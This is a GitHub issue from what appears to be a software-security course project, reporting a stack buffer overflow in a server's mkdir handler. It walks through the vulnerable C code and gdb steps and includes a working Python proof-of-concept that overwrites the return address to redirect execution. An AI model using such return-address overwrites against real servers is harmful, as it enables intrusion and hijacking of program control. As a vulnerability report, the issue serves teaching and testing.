### ISSUE TITLE
Buffer Overflow n°1

### ISSUE THREAD

**Issue by prosticoco** [Zyfarok/softsec-grass#10]
# Buffer Overflow

## Where

in function *do_mkdir* : (*line 298 in server.cpp*)

```c
int do_mkdir(const string &name, const int sock)
{
    char buff[20];

    // check if the user is allowed to execute the command
    if (!check_authentication(sock))
    {
        active_Users.erase(sock);
        write_message(sock, ERR_ACCESS_DENIED);
        return 1;
    }

    char dirname[512];
    strcpy(dirname, name.c_str());
...
```
## What 

here the buffer *dirname* of size 512 bytes can be overflowed when `strcpy(dirname, name.c_str());` is invoked because the variable *name* (which corresponds to the first argument given to the command *mkdir*), has a maximum allowed size of 1024, this is because in the function *connection_handler* : (*line 819 in server.cpp*)

```c
void *connection_handler(void *sockfd)
{
    int sock = *((int *)sockfd);

    char buff[MAX_BUFF_SIZE] = "";

    while (true)
    {
        bzero(buff, 1024);

        // read message from client
        read(sock, buff, sizeof(buff));
...
handle_input(buff, sock);
...
```

the buffer *buff* has a maximum size allowed of 1024, then this buffer is given to the function *handle_input* which will subsequently pass tokens from the buffer to the function *do_mkdir* without doing any size check.

function *handle_input* : (*line 759 in server.cpp*)

```c
void handle_input(const char *command, const int sock)
{
    string input(command);
    istringstream buffer(input);

    vector<string> tokens{istream_iterator<string>(buffer), istream_iterator<string>()};

    wordexp_t p;
    p.we_wordc = 2;

    if (tokens[0] != shell_cmds[2].name)
    {
        p.we_wordc = 0;
        wordexp(command, &p, 0);
    }

    if (tokens.size() == 0)
    {
        write_message(sock, ERR_NULL_CMD);
        return;
    }
    else if (p.we_wordc == 0)
    {
        write_message(sock, ERR_UNDEFINED_CHARS);
        return;
    }

    for (int i = 0; i < NB_COMMANDS; i++)
    {
        if (shell_cmds[i].name == tokens[0])
        {
            if (shell_cmds[i].argc != p.we_wordc - 1)
            {
                write_message(sock, ERR_NBR_PARAMETERS);
                wordfree(&p);
                return;
            }
            string args = string(command + (strlen(shell_cmds[i].name) + 1));
            shell_cmds[i].fct(args, sock);
            wordfree(&p);
            return;
        }
    }
    write_message(sock, ERR_UNKNOWN_CMD);
    wordfree(&p);
    return;
}
```

it is easy to see in this function that no size checks are given to the string *command* which is given to *do_mkdir* after tokenizing the input. 

Therefore if we send the server : 

*mdkir DIRNAME*

with the size of *DIRNAME* exceeding 512, we can overflow the buffer *dirname[512]*

## Exploit and PoC

To exploit the code, we overflow the buffer mentionned above to overwrite the return address of the function *do_mkdir* to the address of the function *hijack_flow*. To do so, we need to gather information by running gdb on the server and performing the following steps : 
1. fetch the address of the *hijack_flow* function
2. break at the *do_mkdir* function 
3. run a client in parallel, authenticate yourself
4. send the command *mkdir $any directory$*
5. break after the strcpy in *do_mkdir* and then print the stack on gdb in order to check how much bytes we should overflow the buffer to overwrite the return address.
6. design the payload *mkdir AAAAA.... + $address of hijack_flow$* where the number of A's is chosen according to step 5 in order to align the address correctly on the return address.

a valid python code is as follows (running on 64-bit fresh kali machine with code compiled with 32-bit addresses and ASLR disabled, addresses will change if you are using a different architecture) :  

```python
import os
import struct
print("login root")
print("pass root")
address_hijack = ""
address_hijack += struct.pack("I",0x56561558)
payload = "mkdir "
payload += "A"*256
payload += "B"*256
payload += "C"*224
payload += address_hijack
print("%s" % payload)
print("exit")
```

To run this code, perform the following steps : 
1. clone the code of this repository
2. make
3. add a configuration file as well as a valid base directory in the folder /bin
4. run the server
5. run *python2 $python file$ | ./client 127.0.0.1 1337

**Comment by dathieu** [comment]
Duplicate of #4

**Comment by Zyfarok** [comment]
Close duplicate
